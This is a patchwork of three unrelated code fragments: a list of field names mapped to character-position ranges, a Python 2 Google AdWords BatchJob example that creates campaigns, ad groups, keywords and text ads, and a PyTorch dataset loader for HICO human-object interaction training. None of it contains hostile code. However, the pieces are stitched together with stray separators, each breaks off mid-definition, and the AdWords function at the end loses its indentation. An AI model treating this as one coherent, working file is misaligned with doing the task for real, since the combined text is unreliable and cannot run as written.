"DR19Qsx83" : ( 33932, 33933 ),
"DR19Qsx84" : ( 33933, 33934 ),
"DR19Qsx85" : ( 33934, 33935 ),
"DR19Qsx86" : ( 33935, 33936 ),
"DR19Qsx87" : ( 33936, 33937 ),
"DR19Qsx88" : ( 33937, 33938 ),
"DR19Qsx89" : ( 33938, 33939 ),
"DR19Qsx90" : ( 33939, 33940 ),
"DR19Qsx91" : ( 33940, 33941 ),
"DR19Qsx92" : ( 33941, 33942 ),
"DR19Qsx93" : ( 33942, 33943 ),
"DR19Qsx94" : ( 33943, 33944 ),
"DR19Qsx95" : ( 33944, 33945 ),
"DR19aQsx77" : ( 33945, 33946 ),
"DR19aQsx78" : ( 33946, 33947 ),
"DR19aQsx79" : ( 33947, 33948 ),
"DR19aQsx80" : ( 33948, 33949 ),
"DR19aQsx81" : ( 33949, 33950 ),
"DR19aQsx82" : ( 33950, 33951 ),
"DR19aQsx83" : ( 33951, 33952 ),
"DR19aQsx84" : ( 33952, 33953 ),
"DR19aQsx85" : ( 33953, 33954 ),
"DR19aQsx86" : ( 33954, 33955 ),
"DR19aQsx87" : ( 33955, 33956 ),
"DR19aQsx88" : ( 33956, 33957 ),
"DR19aQsx89" : ( 33957, 33958 ),
"DR19aQsx90" : ( 33958, 33959 ),
"DR19aQsx91" : ( 33959, 33960 ),
"DR19aQsx92" : ( 33960, 33961 ),
"DR19aQsx93" : ( 33961, 33962 ),
"DR19aQsx94" : ( 33962, 33963 ),
"DR19aQsx95" : ( 33963, 33964 ),
"DR19SxAgeOns_5" : ( 33964, 33966 ),
"DR19SxOns_5" : ( 33966, 33967 ),
"DR19SxAgeRec_5" : ( 33967, 33969 ),
"DR19SxRec_5" : ( 33969, 33970 ),
"DR5YrCl_5" : ( 33970, 33971 ),
"DR6YrCl_5" : ( 33971, 33972 ),
"DR7YrCl_5" : ( 33972, 33973 ),
"DR7aYrCl_5" : ( 33973, 33974 ),
"DR7bYrCl_5" : ( 33974, 33975 ),
"DR8YrCl_5" : ( 33975, 33976 ),
"DR9aYrCl_5" : ( 33976, 33977 ),
"DR10YrCl_5" : ( 33977, 33978 ),
"DR11bYrCl_5" : ( 33978, 33979 ),
"DR11e2YrCl_5" : ( 33979, 33980 ),
"DR12a2YrCl_5" : ( 33980, 33981 ),
"DR12b1YrCl_5" : ( 33981, 33982 ),
"DR12c1YrCl_5" : ( 33982, 33983 ),
"DR13dYrCl_5" : ( 33983, 33984 ),
"DR14bYrCl_5" : ( 33984, 33985 ),
"DR18aYrCl_5" : ( 33985, 33986 ),
"DR15aYrCl_5" : ( 33986, 33987 ),
"DR16YrCl_5" : ( 33987, 33988 ),
"DR17YrCl_5" : ( 33988, 33989 ),
"DR5MnthCl_5" : ( 33989, 33990 ),
"DR6MnthCl_5" : ( 33990, 33991 ),
"DR7MnthCl_5" : ( 33991, 33992 ),
"DR7aMnthCl_5" : ( 33992, 33993 ),
"DR7bMnthCl_5" : ( 33993, 33994 ),
"DR8MnthCl_5" : ( 33994, 33995 ),
"DR9aMnthCl_5" : ( 33995, 33996 ),
"DR10MnthCl_5" : ( 33996, 33997 ),
"DR11bMnthCl_5" : ( 33997, 33998 ),
"DR11e2MnthCl_5" : ( 33998, 33999 ),
"DR12a2MnthCl_5" : ( 33999, 34000 ),
"DR12b1MnthCl_5" : ( 34000, 34001 ),
"DR12c1MnthCl_5" : ( 34001, 34002 ),
"DR13dMnthCl_5" : ( 34002, 34003 ),
"DR14bMnthCl_5" : ( 34003, 34004 ),
"DR18aMnthCl_5" : ( 34004, 34005 ),
"DR15aMnthCl_5" : ( 34005, 34006 ),
"DR16MnthCl_5" : ( 34006, 34007 ),
"DR17MnthCl_5" : ( 34007, 34008 ),
"DR19AgeOns_5" : ( 34008, 34010 ),
"DR19Ons_5" : ( 34010, 34011 ),
"DR19AgeRec_5" : ( 34011, 34013 ),
"DR19Rec_5" : ( 34013, 34014 ),
"DRSxCount5" : ( 34014, 34016 ),
"DRYrClCount5" : ( 34016, 34018 ),
"DRMnthClCount5" : ( 34018, 34020 ),
"DR22FromMnth" : ( 34020, 34022 ),
"DR22FromYr" : ( 34022, 34026 ),
"DR22ToMnth" : ( 34026, 34028 ),
"DR22ToYR" : ( 34028, 34032 ),
"DR22FromMnth2" : ( 34032, 34034 ),
"DR22FromYr2" : ( 34034, 34038 ),
"DR22ToMnth2" : ( 34038, 34040 ),
"DR22ToYR2" : ( 34040, 34044 ),
"DR22FromMnth3" : ( 34044, 34046 ),
"DR22FromYr3" : ( 34046, 34050 ),
"DR22ToMnth3" : ( 34050, 34052 ),
"DR22ToYR3" : ( 34052, 34056 ),
"DR22FromMnth4" : ( 34056, 34058 ),
"DR22FromYr4" : ( 34058, 34062 ),
"DR22ToMnth4" : ( 34062, 34064 ),
"DR22ToYR4" : ( 34064, 34068 ),
"DR22FromMnth5" : ( 34068, 34070 ),
"DR22FromYr5" : ( 34070, 34074 ),
"DR22ToMnth5" : ( 34074, 34076 ),
"DR22ToYR5" : ( 34076, 34080 ),
"DR1a_10" : ( 34080, 34084 ),
"DR1a1_10" : ( 34084, 34085 ),
"DR1a2_10" : ( 34085, 34086 ),
"DR1bAgeOns_10" : ( 34086, 34088 ),
"DR1bOns_10" : ( 34088, 34089 ),
"DR1bAgeRec_10" : ( 34089, 34091 ),
"DR1bRec_10" : ( 34091, 34092 ),
"DR1c_10" : ( 34092, 34093 ),
"DR1a_11" : ( 34093, 34097 ),
"DR1a1_11" : ( 34097, 34098 ),
"DR1a2_11" : ( 34098, 34099 ),
"DR1bAgeOns_11" : ( 34099, 34101 ),
"DR1bOns_11" : ( 34101, 34102 ),
"DR1bAgeRec_11" : ( 34102, 34104 ),
"DR1bRec_11" : ( 34104, 34105 ),
"DR1c_11" : ( 34105, 34106 ),
"DR1a_12" : ( 34106, 34110 ),
"DR1a1_12" : ( 34110, 34111 ),
"DR1a2_12" : ( 34111, 34112 ),
"DR1bAgeOns_12" : ( 34112, 34114 ),
"DR1bOns_12" : ( 34114, 34115 ),
"DR1bAgeRec_12" : ( 34115, 34117 ),
"DR1bRec_12" : ( 34117, 34118 ),
"DR1c_12" : ( 34118, 34119 ),
"DR1a_13" : ( 34119, 34123 ),
"DR1a1_13" : ( 34123, 34124 ),
"DR1a2_13" : ( 34124, 34125 ),
"DR1bAgeOns_13" : ( 34125, 34127 ),
"DR1bOns_13" : ( 34127, 34128 ),
"DR1bAgeRec_13" : ( 34128, 34130 ),
"DR1bRec_13" : ( 34130, 34131 ),
"DR1c_13" : ( 34131, 34132 ),
"DR1a_14" : ( 34132, 34136 ),
"DR1a1_14" : ( 34136, 34137 ),
"DR1a2_14" : ( 34137, 34138 ),
"DR1bAgeOns_14" : ( 34138, 34140 ),
"DR1bOns_14" : ( 34140, 34141 ),
"DR1bAgeRec_14" : ( 34141, 34143 ),
"DR1bRec_14" : ( 34143, 34144 ),
"DR1c_14" : ( 34144, 34145 ),
"DR22_" : ( 34145, 34148 ),
"DR22A_" : ( 34148, 34150 ),
"DR22FromMnth6" : ( 34150, 34152 ),
"DR22FromYr6" : ( 34152, 34156 ),
"DR22ToMnth6" : ( 34156, 34158 ),
"DR22ToYR6" : ( 34158, 34162 ),
"DR22FromMnth7" : ( 34162, 34164 ),
"DR22FromYr7" : ( 34164, 34168 ),
"DR22ToMnth7" : ( 34168, 34170 ),
"DR22ToYR7" : ( 34170, 34174 ),
"DR22FromMnth8" : ( 34174, 34176 ),
"DR22FromYr8" : ( 34176, 34180 ),
"DR22ToMnth8" : ( 34180, 34182 ),
"DR22ToYR8" : ( 34182, 34186 ),
"DR22FromMnth9" : ( 34186, 34188 ),
"DR22FromYr9" : ( 34188, 34192 ),
"DR22ToMnth9" : ( 34192, 34194 ),
"DR22ToYR9" : ( 34194, 34198 ),
"DR22FromMnth10" : ( 34198, 34200 ),
"DR22FromYr10" : ( 34200, 34204 ),
"DR22ToMnth10" : ( 34204, 34206 ),
"DR22ToYR10" : ( 34206, 34210 ),
"DR1a_15" : ( 34210, 34214 ),
"DR1a1_15" : ( 34214, 34215 ),
"DR1a2_15" : ( 34215, 34216 ),
"DR1bAgeOns_15" : ( 34216, 34218 ),
"DR1bOns_15" : ( 34218, 34219 ),
"DR1bAgeRec_15" : ( 34219, 34221 ),
"DR1bRec_15" : ( 34221, 34222 ),
"DR1c_15" : ( 34222, 34223 ),
"DR1a_16" : ( 34223, 34227 ),
"DR1a1_16" : ( 34227, 34228 ),
"DR1a2_16" : ( 34228, 34229 ),
"DR1bAgeOns_16" : ( 34229, 34231 ),
"DR1bOns_16" : ( 34231, 34232 ),
"DR1bAgeRec_16" : ( 34232, 34234 ),
"DR1bRec_16" : ( 34234, 34235 | |
<gh_stars>1-10
#!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This uses the BatchJobService to create a complete Campaign.
The complete Campaign created by this example also includes AdGroups and
KeyWords.
"""
import random
import time
import urllib2
import uuid
from googleads import adwords
# Sizing for the example batch: how many of each entity to create per parent.
NUMBER_OF_CAMPAIGNS_TO_ADD = 2
NUMBER_OF_ADGROUPS_TO_ADD = 2
NUMBER_OF_KEYWORDS_TO_ADD = 5
# Maximum number of polling attempts before giving up on BatchJob results.
MAX_POLL_ATTEMPTS = 5
# BatchJob statuses that mean the job is still in progress when polling.
PENDING_STATUSES = ('ACTIVE', 'AWAITING_FILE', 'CANCELING')
def main(client, number_of_campaigns, number_of_adgroups, number_of_keywords):
  """Creates Campaigns, AdGroups, Keywords and Ads via one BatchJob.

  Builds every operation locally, uploads them in a single request, then
  polls for and prints the results. (Python 2 script: uses the print
  statement and urllib2.)

  Args:
    client: an instantiated AdWordsClient.
    number_of_campaigns: int, Campaigns to create.
    number_of_adgroups: int, AdGroups to create per Campaign.
    number_of_keywords: int, Keywords to create per AdGroup.
  """
  # Initialize BatchJobHelper.
  batch_job_helper = client.GetBatchJobHelper(version='v201601')
  # Create a BatchJob.
  batch_job = AddBatchJob(client)
  # Retrieve the URL used to upload the BatchJob operations.
  upload_url = batch_job['uploadUrl']['url']
  batch_job_id = batch_job['id']
  print 'Created BatchJob with ID "%d", status "%s", and upload URL "%s"' % (
      batch_job['id'], batch_job['status'], upload_url)
  # Generate operations to upload.
  budget_operations = BuildBudgetOperations(batch_job_helper)
  campaign_operations = BuildCampaignOperations(
      batch_job_helper, budget_operations, number_of_campaigns)
  campaign_criterion_operations = BuildCampaignCriterionOperations(
      campaign_operations)
  adgroup_operations = BuildAdGroupOperations(
      batch_job_helper, campaign_operations, number_of_adgroups)
  adgroup_criterion_operations = BuildAdGroupCriterionOperations(
      adgroup_operations, number_of_keywords)
  adgroup_ad_operations = BuildAdGroupAdOperations(adgroup_operations)
  # Upload operations.
  batch_job_helper.UploadOperations(
      upload_url, budget_operations, campaign_operations,
      campaign_criterion_operations, adgroup_operations,
      adgroup_criterion_operations, adgroup_ad_operations)
  # Download and display results.
  download_url = GetBatchJobDownloadUrlWhenReady(client, batch_job_id)
  response = urllib2.urlopen(download_url).read()
  PrintResponse(batch_job_helper, response)
def AddBatchJob(client):
  """Add a new BatchJob to upload operations to.

  Args:
    client: an instantiated AdWordsClient used to retrieve the BatchJob.

  Returns:
    The new BatchJob created by the request.
  """
  batch_job_service = client.GetService('BatchJobService', version='v201601')
  # A single ADD operation with an empty operand is all that is needed to
  # create the job; the service fills in id, status and upload URL.
  operation = {
      'operand': {},
      'operator': 'ADD'
  }
  response = batch_job_service.mutate([operation])
  return response['value'][0]
def BuildAdGroupAdOperations(adgroup_operations):
  """Builds the operations adding a TextAd to each AdGroup.

  Args:
    adgroup_operations: a list containing the operations that will add AdGroups.

  Returns:
    a list containing the operations that will create a new TextAd for each of
    the provided AdGroups.
  """
  operations = []
  for adgroup_operation in adgroup_operations:
    text_ad = {
        'xsi_type': 'TextAd',
        'headline': 'Luxury Cruise to Mars',
        'description1': 'Visit the Red Planet in style.',
        'description2': 'Low-gravity fun for everyone!',
        'displayUrl': 'www.example.com',
        'finalUrls': ['http://www.example.com/1']
    }
    # Batch jobs mix operation types, so the xsi_type must be explicit
    # (a regular service could infer it).
    operations.append({
        'xsi_type': 'AdGroupAdOperation',
        'operand': {
            'adGroupId': adgroup_operation['operand']['id'],
            'ad': text_ad
        },
        'operator': 'ADD'
    })
  return operations
def BuildAdGroupCriterionOperations(adgroup_operations, number_of_keywords=1):
  """Builds the operations adding a Keyword Criterion to each AdGroup.

  Args:
    adgroup_operations: a list containing the operations that will add AdGroups.
    number_of_keywords: an int defining the number of Keywords to be created.

  Returns:
    a list containing the operations that will create a new Keyword Criterion
    associated with each provided AdGroup.
  """
  operations = []
  for adgroup_operation in adgroup_operations:
    adgroup_id = adgroup_operation['operand']['id']
    for i in range(number_of_keywords):
      # Every even-indexed keyword gets '!!!' appended, which is invalid
      # and deliberately demonstrates batch-job error handling.
      keyword_text = 'mars%s%s' % (i, '!!!' if i % 2 == 0 else '')
      # Batch jobs mix operation types, so the xsi_type must be explicit.
      operations.append({
          'xsi_type': 'AdGroupCriterionOperation',
          'operand': {
              'xsi_type': 'BiddableAdGroupCriterion',
              'adGroupId': adgroup_id,
              'criterion': {
                  'xsi_type': 'Keyword',
                  'text': keyword_text,
                  'matchType': 'BROAD'
              }
          },
          'operator': 'ADD'
      })
  return operations
def BuildAdGroupOperations(batch_job_helper,
                           campaign_operations, number_of_adgroups=1):
  """Builds the operations adding the desired number of AdGroups per Campaign.

  Note: when the AdGroups are created, they get different Ids than the
  temporary ones generated here, which only identify them inside this
  BatchJob.

  Args:
    batch_job_helper: a BatchJobHelper instance.
    campaign_operations: a list containing the operations that will add
      Campaigns.
    number_of_adgroups: an int defining the number of AdGroups to be created
      per Campaign.

  Returns:
    a list containing the operations that will add the desired number of
    AdGroups to each of the provided Campaigns.
  """
  operations = []
  for campaign_operation in campaign_operations:
    campaign_id = campaign_operation['operand']['id']
    for _ in range(number_of_adgroups):
      adgroup = {
          'campaignId': campaign_id,
          'id': batch_job_helper.GetId(),
          'name': 'Batch Ad Group #%s' % uuid.uuid4(),
          'biddingStrategyConfiguration': {
              'bids': [
                  {
                      'xsi_type': 'CpcBid',
                      'bid': {
                          'microAmount': 10000000
                      }
                  }
              ]
          }
      }
      # Batch jobs mix operation types, so the xsi_type must be explicit.
      operations.append({
          'xsi_type': 'AdGroupOperation',
          'operand': adgroup,
          'operator': 'ADD'
      })
  return operations
def BuildBudgetOperations(batch_job_helper):
  """Builds the operations needed to create a new Budget.

  Note: when the Budget is created it gets a different Id than the temporary
  one generated here, which only identifies it inside this BatchJob.

  Args:
    batch_job_helper: a BatchJobHelper instance.

  Returns:
    a list containing the operation that will create a new Budget.
  """
  budget = {
      'name': 'Batch budget #%s' % uuid.uuid4(),
      # Temporary Id used by other operations that require a budgetId.
      'budgetId': batch_job_helper.GetId(),
      'amount': {
          'microAmount': '50000000'
      },
      'deliveryMethod': 'STANDARD',
      'period': 'DAILY'
  }
  # Batch jobs mix operation types, so the xsi_type must be explicit.
  return [{
      'xsi_type': 'BudgetOperation',
      'operand': budget,
      'operator': 'ADD'
  }]
def BuildCampaignCriterionOperations(campaign_operations):
  """Builds the operations needed to create Negative Campaign Criterion.

  Args:
    campaign_operations: a list containing the operations that will add
      Campaigns.

  Returns:
    a list containing the operations that will create a new Negative Campaign
    Criterion associated with each provided Campaign.
  """
  operations = []
  for campaign_operation in campaign_operations:
    # Batch jobs mix operation types, so the xsi_type must be explicit.
    operations.append({
        'xsi_type': 'CampaignCriterionOperation',
        'operand': {
            'xsi_type': 'NegativeCampaignCriterion',
            'campaignId': campaign_operation['operand']['id'],
            'criterion': {
                'xsi_type': 'Keyword',
                'matchType': 'BROAD',
                'text': 'venus'
            }
        },
        'operator': 'ADD'
    })
  return operations
def BuildCampaignOperations(batch_job_helper,
                            budget_operations, number_of_campaigns=1):
  """Builds the operations needed to create new Campaigns.

  Note: when the Campaigns are created, they get different Ids than the
  temporary ones generated here, which only identify them inside this
  BatchJob.

  Args:
    batch_job_helper: a BatchJobHelper instance.
    budget_operations: a list containing the operation that will add the
      budget used by these Campaigns.
    number_of_campaigns: an int number defining the number of campaigns to be
      created.

  Returns:
    a list containing the operations to create the desired number of
    Campaigns.
  """
  # Every new Campaign shares the Budget built by the budget operation.
  shared_budget_id = budget_operations[0]['operand']['budgetId']
  operations = []
  for _ in range(number_of_campaigns):
    campaign = {
        'name': 'Batch Campaign #%s' % uuid.uuid4(),
        'status': 'PAUSED',
        # Temporary Id used by other operations that require a campaignId.
        'id': batch_job_helper.GetId(),
        'advertisingChannelType': 'SEARCH',
        # Note that only the budgetId is required.
        'budget': {
            'budgetId': shared_budget_id
        },
        'biddingStrategyConfiguration': {
            'biddingStrategyType': 'MANUAL_CPC'
        }
    }
    # Batch jobs mix operation types, so the xsi_type must be explicit.
    operations.append({
        'xsi_type': 'CampaignOperation',
        'operand': campaign,
        'operator': 'ADD'
    })
  return operations
def GetBatchJob(client, batch_job_id):
"""Retrieves the BatchJob with the given id.
Args:
client: an instantiated AdWordsClient used to retrieve the BatchJob.
batch_job_id: a long identifying the BatchJob to be retrieved.
| |
<gh_stars>10-100
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import os
import pickle
import random
import numpy as np
from PIL import Image
from random import randint
import torch
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.config import cfg
class HICODatasetObject(torch.utils.data.Dataset):
def __init__(
self, ann_file, root, train_val_neg_file, word_embedding_file, negative_sample_ratio, split, transforms=None
):
self.img_dir = root
self.annotations = pickle.load(open(ann_file, "rb"), encoding='latin1')
self.word_embeddings = pickle.load(open(word_embedding_file, "rb"), encoding='latin1')
self.negative_sample_ratio = negative_sample_ratio
self.tran_val_neg_file = pickle.load(open(train_val_neg_file, "rb"), encoding='latin1')
self.num_classes = 117
self.split = split
self._transforms = transforms
    def __getitem__(self, idx):
        """Load one image and build its human/object pair training blobs.

        Returns a 3-tuple of (transformed PIL image, blobs dict from
        bbox_augmentation plus spatial patterns and BoxLists, image id).
        """
        anno = self.annotations[idx]
        # All pairs in one annotation entry share the same image.
        image_id = anno[0]['image_id']
        img_path = os.path.join(self.img_dir, "HICO_train2015_%08d.jpg" % image_id)
        img = Image.open(img_path)
        img = img.convert('RGB')
        # when using Image.open to read images, img.size= (640, 480), while using cv2.imread, im.shape = (480, 640)
        # to be consistent with previous code, I used img.height, img.width here
        im_shape = (img.height, img.width) # (480, 640)
        blobs = self.bbox_augmentation(anno, image_id, im_shape)
        # create a BoxList from the boxes
        human_boxlist = BoxList(blobs['human_boxes'], img.size, mode="xyxy") # image_size=(width, height)
        object_boxlist = BoxList(blobs['object_boxes'], img.size, mode="xyxy") # image_size=(width, height)
        if self._transforms is not None:
            img, human_boxlist, object_boxlist = self._transforms(img, human_boxlist, object_boxlist)
        # Rasterize each (possibly transformed) human/object pair into a
        # 2x64x64 binary spatial pattern; stacked into one tensor below.
        spatials = []
        for human_box, object_box in zip(human_boxlist.bbox, object_boxlist.bbox):
            ho_spatial = self.generate_spatial(human_box.numpy(), object_box.numpy()).reshape(1, 2, 64, 64)
            spatials.append(ho_spatial)
        blobs['spatials_object_centric'] = torch.FloatTensor(spatials).reshape(-1, 2, 64, 64)
        # Replace raw box tensors with 1-tuples of BoxLists for the collator.
        blobs['human_boxes'], blobs['object_boxes'] = (human_boxlist,), (object_boxlist,)
        return img, blobs, image_id
def get_img_info(self, index):
img_id = self.annotations[index][0]['image_id']
img_path = os.path.join(self.img_dir, "HICO_train2015_%08d.jpg" % img_id)
img = Image.open(img_path)
# width, height = img.size
height, width = img.height, img.width
return {
"height": height,
"width": width,
"idx": index,
"img_path": img_path,
"ann": self.annotations[index],
}
    def __len__(self):
        """Return the number of annotated images available in this split."""
        return len(self.annotations)
    def bbox_augmentation(self, anno, image_id, im_shape):
        """Jitter ground-truth pairs and mix in sampled negative pairs.

        Args:
            anno: list of human/object pair dicts for one image.
            image_id: id used to look up negatives in self.tran_val_neg_file.
            im_shape: (height, width) used to clamp augmented boxes.

        Returns:
            dict of FloatTensors: positive+negative human/object boxes
            (N, 4), pair verb labels (N, num_classes), object word embeddings
            (N, 300), verb plausibility mask (N, num_classes), per-positive
            human/object labels (num_pos, num_classes), and "pos_num".
        """
        # initialization
        human_boxes = []
        object_boxes = []
        human_labels = []
        object_labels = []
        ho_pair_labels = []
        object_word_embeddings = []
        # spatials = []
        mask = []
        # ground truth box augmentation
        for human_object_pair in anno:
            human_box_aug = self.augment_box_one(human_object_pair['human_box'], im_shape)
            human_boxes.append(human_box_aug)
            object_box_aug = self.augment_box_one(human_object_pair['object_box'], im_shape)
            object_boxes.append(object_box_aug)
            human_verbs_to_vector = self.verb_list_to_vector(human_object_pair['human_action_id_list'])
            human_labels.append(human_verbs_to_vector)
            object_verbs_to_vector = self.verb_list_to_vector(human_object_pair['object_action_id_list'])
            object_labels.append(object_verbs_to_vector)
            ho_verbs_to_vector = self.verb_list_to_vector(human_object_pair['verb_id_list'])
            ho_pair_labels.append(ho_verbs_to_vector)
            object_class = human_object_pair['object_class']
            object_word_embeddings.append(self.word_embeddings[object_class].reshape(300))
            #@Done made bbox to shape (1,4), not (1,5), so modified the code here
            #@Done changed to (1, 2, 64, 64)
            # ho_spatial = self.generate_spatial(human_box_aug, object_box_aug).reshape(1, 2, 64, 64)
            # spatials.append(ho_spatial)
            curr_mask = self.generate_mask(human_object_pair['possible_verb_with_object'])
            mask.append(curr_mask)
        num_pos = len(human_boxes)
        # Append negatives only when this image has precomputed negative pairs.
        if image_id in self.tran_val_neg_file.keys():
            human_boxes_neg = []
            object_boxes_neg = []
            object_word_embeddings_neg = []
            # spatials_neg = []
            mask_neg = []
            # Keep only negatives whose object overlaps the first GT object
            # box (IoU > 0.6), then augment them like the positives.
            for negative_pair in self.tran_val_neg_file[image_id]:
                if self.bbox_iou(negative_pair['object_box'], anno[0]['object_box']) > 0.6:
                    human_box_neg_aug = self.augment_box_one(negative_pair['human_box'], im_shape)
                    human_boxes_neg.append(human_box_neg_aug)
                    object_box_neg_aug = self.augment_box_one(negative_pair['object_box'], im_shape)
                    object_boxes_neg.append(object_box_neg_aug)
                    object_class = negative_pair['object_class']
                    object_word_embeddings_neg.append(self.word_embeddings[object_class].reshape(300))
                    # @Done made bbox to shape (1,4) not (1,5), so modified the code here
                    # ho_spatial = self.generate_spatial(human_box_neg_aug[0, 1:], object_box_neg_aug[0, 1:]).reshape(1, 64, 64, 2)
                    # ho_spatial = self.generate_spatial(human_box_neg_aug, object_box_neg_aug).reshape(1, 2, 64, 64)
                    # spatials_neg.append(ho_spatial)
                    curr_mask = self.generate_mask(negative_pair['possible_verb_with_object'])
                    mask_neg.append(curr_mask)
            # use all Neg example
            if self.negative_sample_ratio != -1:
                # subsample negative examples if we have too many
                if len(human_boxes_neg) >= self.negative_sample_ratio * num_pos:
                    idx_list = random.sample(range(len(human_boxes_neg)), len(human_boxes_neg))
                    idx_list = idx_list[:self.negative_sample_ratio * num_pos]
                    human_boxes_neg = [human_boxes_neg[i] for i in idx_list]
                    object_boxes_neg = [object_boxes_neg[i] for i in idx_list]
                    object_word_embeddings_neg = [object_word_embeddings_neg[i] for i in idx_list]
                    # spatials_neg = [spatials_neg[i] for i in idx_list]
                    mask_neg = [mask_neg[i] for i in idx_list]
                # generate more negative examples if we have too few
                if len(human_boxes_neg) < self.negative_sample_ratio * num_pos and len(human_boxes_neg) != 0:
                    idx_list = np.random.choice(len(human_boxes_neg), self.negative_sample_ratio * num_pos - len(human_boxes_neg)).tolist()
                    human_boxes_neg += [human_boxes_neg[i] for i in idx_list]
                    object_boxes_neg += [object_boxes_neg[i] for i in idx_list]
                    object_word_embeddings_neg += [object_word_embeddings_neg[i] for i in idx_list]
                    # spatials_neg += [spatials_neg[i] for i in idx_list]
                    mask_neg += [mask_neg[i] for i in idx_list]
            human_boxes += human_boxes_neg
            object_boxes += object_boxes_neg
            object_word_embeddings += object_word_embeddings_neg
            # spatials += spatials_neg
            mask += mask_neg
        num_pos_neg = len(human_boxes)
        # Label the appended negatives according to config: all-zero verb
        # vectors, or the single "no interaction" verb id 57.
        if cfg.DATASETS.NEG_VERB_ALLZERO == 1:
            for _ in range(num_pos_neg - num_pos):
                ho_pair_labels.append(np.zeros(self.num_classes))
        elif cfg.DATASETS.NEG_VERB_ALLZERO == 0:
            for _ in range(num_pos_neg - num_pos):
                ho_pair_labels.append(self.verb_list_to_vector([57]))
        else:
            assert (0)
        assert len(ho_pair_labels)==num_pos_neg
        blobs = {}
        # @Done made bbox to shape (1,4), not (1,5), so modified the code here
        blobs['human_boxes'] = torch.FloatTensor(human_boxes).reshape(num_pos_neg, 4)
        blobs['object_boxes'] = torch.FloatTensor(object_boxes).reshape(num_pos_neg, 4)
        blobs['ho_pair_labels_object_centric'] = torch.FloatTensor(ho_pair_labels).reshape(num_pos_neg, self.num_classes)
        blobs['object_word_embeddings_object_centric'] = torch.FloatTensor(object_word_embeddings).reshape(num_pos_neg, 300)
        blobs['mask_ho'] = torch.FloatTensor(mask).reshape(num_pos_neg, self.num_classes)
        blobs['human_labels'] = torch.FloatTensor(human_labels).reshape(num_pos, self.num_classes)
        blobs['object_labels'] = torch.FloatTensor(object_labels).reshape(num_pos, self.num_classes)
        blobs['pos_num'] = num_pos
        return blobs
def augment_box_one(self, bbox, shape):
height = bbox[3] - bbox[1]
width = bbox[2] - bbox[0]
y_center = (bbox[3] + bbox[1]) / 2
x_center = (bbox[2] + bbox[0]) / 2
thres = 0.7
for count in range(20):
ratio = 1 + randint(-10, 10) * 0.01
y_shift = randint(-np.floor(height), np.floor(height)) * 0.1
x_shift = randint(-np.floor(width), np.floor(width)) * 0.1
x1 = max(0, x_center + x_shift - ratio * width / 2)
x2 = min(shape[1] - 1, x_center + x_shift + ratio * width / 2)
y1 = max(0, y_center + y_shift - ratio * height / 2)
y2 = min(shape[0] - 1, y_center + y_shift + ratio * height / 2)
if self.bbox_iou(bbox, np.array([x1, y1, x2, y2])) > thres:
box = np.array([x1, y1, x2, y2]).astype(np.float32)
return box
# @Done removed the first 0 here,
# because I want to directly use the transform function
# and it can be directly processed by pooler
# return np.array([0, bbox[0], bbox[1], bbox[2], bbox[3]]).reshape(1, 5).astype(np.float32)
return bbox
def bbox_iou(self, boxA, boxB):
ixmin = np.maximum(boxA[0], boxB[0])
iymin = np.maximum(boxA[1], boxB[1])
ixmax = np.minimum(boxA[2], boxB[2])
iymax = np.minimum(boxA[3], boxB[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
# union
uni = ((boxB[2] - boxB[0] + 1.) * (boxB[3] - boxB[1] + 1.) +
(boxA[2] - boxA[0] + 1.) *
(boxA[3] - boxA[1] + 1.) - inters)
overlaps = inters / uni
return overlaps
def verb_list_to_vector(self, action_list):
action_ = np.zeros(self.num_classes)
for GT_idx in action_list:
action_[GT_idx] = 1
# action_ = action_.reshape(1, self.num_classes)
return action_
def generate_mask(self, mask_list):
mask_ = np.zeros(self.num_classes)
for GT_idx in mask_list:
mask_[GT_idx] = 1
# mask_ = mask_.reshape(1, self.num_classes)
return mask_
def generate_spatial(self, human_box, object_box):
# InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
# max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
# height = InteractionPattern[3] - InteractionPattern[1] + 1
# width = InteractionPattern[2] - InteractionPattern[0] + 1
# if height > width:
# H, O = self.bbox_trans(human_box, object_box, 'height')
# else:
# H, O = self.bbox_trans(human_box, object_box, 'width')
# human_box = human_box.numpy()
# object_box = object_box.numpy()
H, O = self.bbox_trans(human_box, object_box)
Pattern = np.zeros((2, 64, 64))
Pattern[0, int(H[1]):int(H[3]) + 1, int(H[0]):int(H[2]) + 1] = 1
Pattern[1, int(O[1]):int(O[3]) + 1, int(O[0]):int(O[2]) + 1] = 1
return Pattern
def bbox_trans(self, human_box_ori, object_box_ori, size=64):
human_box = human_box_ori.copy()
object_box = object_box_ori.copy()
InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
height = InteractionPattern[3] - InteractionPattern[1] + 1
width = InteractionPattern[2] - InteractionPattern[0] + 1
if height > width:
ratio = 'height'
else:
ratio = 'width'
# shift the top-left corner to (0,0)
human_box[0] -= InteractionPattern[0]
human_box[2] -= InteractionPattern[0]
human_box[1] -= InteractionPattern[1]
human_box[3] -= InteractionPattern[1]
object_box[0] -= InteractionPattern[0]
object_box[2] -= InteractionPattern[0]
object_box[1] -= InteractionPattern[1]
object_box[3] -= InteractionPattern[1]
if ratio == 'height': # height is larger than width
human_box[0] = 0 + size * human_box[0] / height
human_box[1] = 0 + size * human_box[1] / height
human_box[2] = (size * width / height - 1) - size * (width - 1 - human_box[2]) / height
human_box[3] = (size - 1) - size * (height - 1 - human_box[3]) / height
object_box[0] = 0 + size * object_box[0] / height
object_box[1] = 0 + size * object_box[1] / height
object_box[2] = (size * width / height - 1) - size * (width - 1 - object_box[2]) / height
object_box[3] = (size - 1) - size * (height - 1 - object_box[3]) / height
# Need to shift horizontally
InteractionPattern = [min(human_box[0], object_box[0]), min(human_box[1], object_box[1]),
max(human_box[2], object_box[2]), max(human_box[3], object_box[3])]
